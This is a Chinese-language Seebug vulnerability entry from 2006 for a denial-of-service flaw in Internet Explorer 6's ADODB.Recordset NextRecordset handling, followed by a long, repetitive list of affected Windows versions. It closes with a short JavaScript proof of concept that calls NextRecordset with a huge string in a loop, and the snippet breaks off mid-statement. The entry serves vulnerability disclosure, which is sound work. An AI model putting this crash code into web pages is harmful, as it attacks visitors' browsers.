Microsoft Internet Explorer ADODB.Recordset NextRecordset拒绝服务漏洞

2006-12-06T00:00:00
ID SSV:696
Type seebug
Reporter Root
Modified 2006-12-06T00:00:00

Description

Microsoft Internet Explorer是一款流行的WEB浏览器。 Microsoft Internet Explorer处理ADODB.Recordset NextRecordset对象存在问题,远程攻击者可以利用漏洞可对应用程序进行拒绝服务攻击。 构建包含恶意ADODB.Recordset NextRecordset对象的WEB页,诱使用户访问,可导致用户的IE浏览器崩溃,造成拒绝服务攻击。可能存在任意代码执行可能。

Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services - Microsoft Windows 98 - Microsoft Windows 98 - Microsoft Windows 98SE - Microsoft Windows 98SE - Microsoft Windows ME - Microsoft Windows ME - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Workstation 4.0 SP6a - Microsoft Windows NT Workstation 4.0 SP6a + Microsoft Windows Server 2003 Datacenter Edition + Microsoft Windows Server 2003 Datacenter Edition + Microsoft Windows Server 2003 Datacenter Edition 64-bit + Microsoft Windows Server 2003 Datacenter Edition 64-bit + Microsoft Windows Server 2003 Enterprise Edition + Microsoft Windows Server 2003 Enterprise Edition + Microsoft Windows Server 2003 Enterprise Edition 64-bit + Microsoft Windows Server 2003 Enterprise Edition 64-bit + Microsoft Windows Server 2003 Standard Edition + Microsoft Windows Server 2003 Standard Edition + Microsoft Windows Server 2003 Web Edition + Microsoft Windows Server 2003 Web Edition + Microsoft Windows XP Home + Microsoft Windows XP Home + Microsoft Windows XP Professional + Microsoft Windows XP Professional <a href="http://www.microsoft.com/windows/ie/default.mspx" target="_blank">http://www.microsoft.com/windows/ie/default.mspx</a>

                                        
                                            
                                                可参考如下测试代码:
function Demo() {
var a = new ActiveXObject('ADODB.Recordset');
var b = 'XXXX';
while (b.length &lt;= 1024*512) b+=b;

for (var i = 0; i &lt; 32768; i++)
try { a.NextRecordset(b); } catch(e)